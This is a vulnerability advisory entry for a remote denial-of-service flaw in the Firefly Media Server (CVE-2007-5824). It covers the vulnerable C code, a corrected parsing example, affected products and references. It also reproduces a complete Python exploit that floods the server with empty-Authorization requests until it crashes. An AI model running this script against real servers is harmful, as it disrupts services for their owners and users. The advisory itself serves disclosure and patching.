Firefly Media Server NULL Pointer Dereference Vulnerability

Vulnerability ID: 1113888    Vulnerability type: Input validation
Published: 2007-11-02    Updated: 2008-09-02
CVE: CVE-2007-5824    CNNVD ID: CNNVD-200711-050
Platform: Linux    CVSS score: 7.1
|Vulnerability source
https://www.exploit-db.com/exploits/4600
https://www.securityfocus.com/bid/26309
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200711-050
|Vulnerability details
Firefly is the open-source media server used by the Roku SoundBridge and iTunes. Firefly mishandles malformed requests, and a remote attacker could use this flaw to crash the server. In Firefly's webserver.c, line 631 of the ws_getheaders function contains a NULL pointer dereference. If any header line other than the first contains no ':', strsep(&last, ":") sets the variable last to NULL, and the code then dereferences last:

strsep(&last, ":");
if (last == first) {
    DPRINTF(E_WARN, L_WS, "Thread %d: Invalid header: %s\n", pwsc->threadno, first);
} else {
    while (*last == ' ') last++;

Line 1399 of the ws_decodepassword function in webserver.c has a NULL pointer dereference as well. The header variable is incremented until a space character is found, so the read can run past the end of the buffer:

/* xlat table is initialized */
while (*header != ' ') header++;
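The two loops above fail for the same reason: each scans for a character it assumes is present. The following is an added example, not Firefly's code, showing a header-line parser and an Authorization-value scanner written the way the advisory's two sites should have been, with the missing checks in place (the function names and the return conventions are this example's own):

```c
#define _DEFAULT_SOURCE          /* strsep() is a BSD/GNU extension */
#include <stddef.h>
#include <string.h>

char *strsep(char **stringp, const char *delim);   /* prototype in case the headers hide it */

/* Split one "Name: value" request-header line in place, as ws_getheaders does.
 * Returns 1 for a well-formed header (name/value set), 0 for a line with no ':'.
 * strsep() sets 'last' to NULL when the delimiter is absent; the original code
 * went straight to "while (*last == ' ')" and dereferenced that NULL. */
int parse_header_line(char *line, char **name, char **value)
{
    char *last = line;
    char *first = strsep(&last, ":");   /* first == line; last -> text after ':' or NULL */

    if (last == NULL)                    /* the check the original loop lacked */
        return 0;                        /* malformed header: reject, do not crash */
    while (*last == ' ')                 /* safe: last is a NUL-terminated string */
        last++;
    *name = first;
    *value = last;
    return 1;
}

/* Skip the scheme token ("Basic") of an Authorization value and return a pointer
 * to the credentials, or NULL when there is no space-separated second token.
 * The original "while (*header != ' ') header++;" has no NUL check, so the
 * empty Authorization value sent by the exploit walks off the end of the buffer. */
const char *auth_credentials(const char *header)
{
    while (*header != '\0' && *header != ' ')   /* stop at NUL as well as at space */
        header++;
    if (*header == '\0')
        return NULL;                             /* "" or "Basic" alone: nothing to decode */
    return header + 1;
}
```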
|Exploit (EXP)
#!C:\python25\python25.exe

"""
Advisory : [UPH-07-02]
mt-dappd/Firefly media server remote DoS
Discovered by nnp
http://www.unprotectedhex.com
"""

import sys
import socket
import time

# usage: <script> host port
if len(sys.argv) != 3:
    sys.exit(-1)

# Request with an empty Authorization header: ws_decodepassword scans the
# empty value for a space and reads past the end of the buffer.
kill_msg = """GET /xml-rpc?method=stats HTTP/1.1\r\n 
Authorization:\r\n\r\n"""

host = sys.argv[1]
port = sys.argv[2]

print '[+] Host : ' + host
print '[+] Port : ' + port

print "[+] Sending "
print kill_msg

# Reconnect and resend until the server stops accepting connections (Python 2 code).
ctr = 1
while 1:
    print '[+] Ctr : ' + str(ctr)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, int(port)))
    s.send(kill_msg)
    s.close()
    ctr += 1

# milw0rm.com [2007-11-02]
|Affected products
Gentoo Linux
Firefly Media Server 0.2.4
Debian Linux 4.0 sparc
Debian Linux 4.0 s/390
Debian Linux 4.0 powerpc
Debian Linux 4.0 mipsel
Debian Linux 4.0
|References

Source: BUGTRAQ
Name: 20071102 Re: [UPH-07-01] Firefly Media Server DoS
Link: http://www.securityfocus.com/archive/1/archive/1/483215/100/0/threaded
Source: BUGTRAQ
Name: 20071102 [UPH-07-02] Firefly Media Server DoS
Link: http://www.securityfocus.com/archive/1/archive/1/483211/100/0/threaded
Source: BUGTRAQ
Name: 20071102 [UPH-07-01] Firefly Media Server DoS
Link: http://www.securityfocus.com/archive/1/archive/1/483210/100/0/threaded
Source: MILW0RM
Name: 4600
Link: http://www.milw0rm.com/exploits/4600
Source: DEBIAN
Name: DSA-1597
Link: http://www.debian.org/security/2008/dsa-1597
Source: SECUNIA
Name: 30661
Link: http://secunia.com/advisories/30661
Source: XF
Name: firefly-decodepassword-dos(38242)
Link: http://xforce.iss.net/xforce/xfdb/38242
Source: XF
Name: firefly-getheaders-dos(38241)
Link: http://xforce.iss.net/xforce/xfdb/38241
Source: BID
Name: 26309
Link: http://www.securityfocus.com/bid/26309
Source: GENTOO
Name: GLSA-200712-18
Link: http://www.gentoo.org/security/en/glsa/glsa-200712-18.xml
Source: sourceforge.net
Link: http://sourceforge.net/project/shownotes.php?group_id=98211&release_id=548679
Source: SEC